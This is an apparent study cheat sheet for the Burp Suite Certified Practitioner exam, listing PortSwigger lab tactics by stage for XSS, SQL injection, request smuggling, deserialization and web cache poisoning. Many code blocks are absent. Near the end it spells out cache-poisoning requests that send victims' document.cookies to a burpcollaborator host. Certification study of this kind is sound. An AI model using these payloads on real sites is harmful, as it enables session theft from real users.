BSCP Methodology
Table of Contents
Exam Info
BSCP Cheat sheet = needs translate There is always an administrator account with the username "administrator", plus a lower-privileged account usually called "carlos". If you find a username enumeration vulnerability, you may be able to break into a low-privileged account using the following username list and password list.
Each application has up to one active user, who will be logged in either as a user or an administrator. You can assume that they will visit the homepage of the site every 15 seconds, and click any links in any emails they receive from the application. You can use exploit server's "send to victim" functionality to target them with reflected vulnerabilities.
If you find an SSRF vulnerability, you can use it to read files by accessing an internal-only service, running on localhost on port 6566.
Each stage can be cross referenced to the types of vulnerabilities you can observe.
Objective for Stage 1: Get any user access
SQL Injection
Cross-Site Scripting
Authentication / Credentials Brute force
Request Smuggling
Web Cache Poisoning
Objective for Stage 2: Get Admin access
SQL Injection
Cross-Site Scripting
Cross Site Request Forgery
HTTP host header attacks
Server-Side Request Forgery
Access Control vulnerabilities
Authentication / Credentials Brute force
Objective for Stage 3: Read Contents of ‘/home/carlos/secret’
XML External Entities
SQL Injection
Command Injection
Server-Side Template Injection
Path Traversal
File Upload attacks
Insecure Deserialization
Useful Burp extensions (some of them requires burpsuite pro) and tips
Hackvertor
Copy As Python-Requests
Java Deserialization Scanner | ysoserial.jar for manual exploitation(prefer because sometime this extension it doesn't work as it should)
HTTP Request Smuggler
Param Miner
Cross-Site Scripting Section
When the exam involve XSS for the user part start search about javascript file in the source code or use the DOM Invader into search forms. You can find an injection point with some payloads from this repository - PayloadsAllTheThings XSS Injection Also here - XSS Payloads
Bypass restrictions method 1
Sometimes we found a XSS injection point but with some keyword restrictions, so we have to bypass these restrictions with some techniques like below.
Generate the base64 payload
Insert the base64 payload into atob function
Capture credentials from auto-filled forms
Sometimes we use password managers that fill in forms automatically and with this technique we can grab those credentials just making a small html form.
DOM XSS
An awesome google chrome(from burp suite) extension is DOM Invader which you can use it for DOM XSS testing
Exploit Server Section
Send exploit to victim (Reflected XSS in search bar)
With <meta>
html tag we can redirect the "victim" to our javascript injected search query.
Useful source from portswigger during exam: Cross Site Scriping Cheat sheet
Different XSS Payloads
SQL Injection Section
SQL Injection cheat sheet PortSwigger
Useful solved labs:
Useful scripts for blind sql injection exfil
PostgreSQL
Time Based
Identify time based
Database Dump Time Based
Table Dump Time Based
Columns Dump Time Based
Exfiltrate data with SQLMap
Command Injection Section
Directory Traversal Section
CSRF Section
Referer validation depends on header being present
<meta name="referrer" content="no-referrer">
CSRF with broken Referer validation
Insecure Deserialization Section
Java
If you have Java Deserialization Scanner
burp extension you can do an active scan(pro version only) and maybe you will find something ;) at least exploit it manually with the below tool.
ysoseriar.jar
payloads about ysoseriar
Dont forget the below payloads requires url encoding after payload are generated
For more information about payloads and stuff you can find in the ysoserial official repository
PHP
Simple modifying of PHP serialized object
As we can see there is a field key called admin
with one boolean filed value 0 -> False. Changing the boolean value to 1 automatically we are going to be a administrator.
Modifying PHP serialized data types
As we can see the serialized cookie is validated with access_token
field. We can imagine the back-end access_token validation
So we can perform the attack changing the access_token
from string type to boolean(1) -> true. see below:
Ruby
you can run the above script here https://www.onlinegdb.com/online_ruby_compiler
HTTP request smuggling Section
Useful solved labs:
For manual exploitation CL.TE TE.CL we can use the Simple HTTP Smuggler Generator CL.TE TE.CL
Response queue poisoning via H2.TE request smuggling
"Most of the time, you will receive your own 404 response. Any other response code indicates that you have successfully captured a response intended for the admin user. Repeat this process until you capture a 302 response containing the admin's new post-login session cookie."
Request smuggling via CRLF injection
Add a foo
header and from inspector
change the value of foo
header like below
Request splitting via CRLF injection
Add a foo
header and from inspector
change the value of foo header like below
Send requests repeatedly until you get 302 redirect to /my-account with the session cookie of the administrator.
XML external entity (XXE) injection Section
xIncLUde attack xxe
Information disclosure Section
Always go for directory brute force and for .files(hidden files) e.g. .git
Web Cache Poisoning Cache
Useful tip for web cache poisoning is to use the paraminer
burp exension.
Web cache poisoning with an unkeyed cookie:
fehost="-alert(document.cookies)-"
Basic Web cache
X-Forwarded-Host
header has been used by the application to generate an Open Graph URL inside a meta tag.
Targeted web cache poisoning using an unknown header
Vary: User-Agent
-> "For example, if the attacker knows that the User-Agent header is part of the cache key, by first identifying the user agent of the intended victims, they could tailor the attack so that only users with that user agent are affected."
X-Host: exploitserver.net/resources/js/tracking.js
Steal other users User-Agents
: If you have post functionality you can use this payload:
and final step is to poison the victims user-agents stoled from img tag
Parameter cloaking
GET /js/geolocate.js?callback=setCountryCookie&utm_content=foo;callback=alert(1)
Parameter cloaking steal cookies:
GET /js/geolocate.js?callback=setCountryCookie&utm_content=aaa;callback=fetch("https://xxxx.burpcollaborator.net/c="%2bdocument.cookies); HTTP/2
Steal cookies through cache poisoning via an unkeyed query parameter
GET /?utm_content='/><script><@burp_urlencode>fetch("https://m0nckht7kyvq0d3n793ad2ey2p8fw4.burpcollaborator.net/?c="+document.cookies)<@/burp_urlencode></script> HTTP/2
ps. dont forget the required burp extension called hackvertor in order to URL encode the javascript payload
X-Forwarded-Scheme web cache poisoning method
Last updated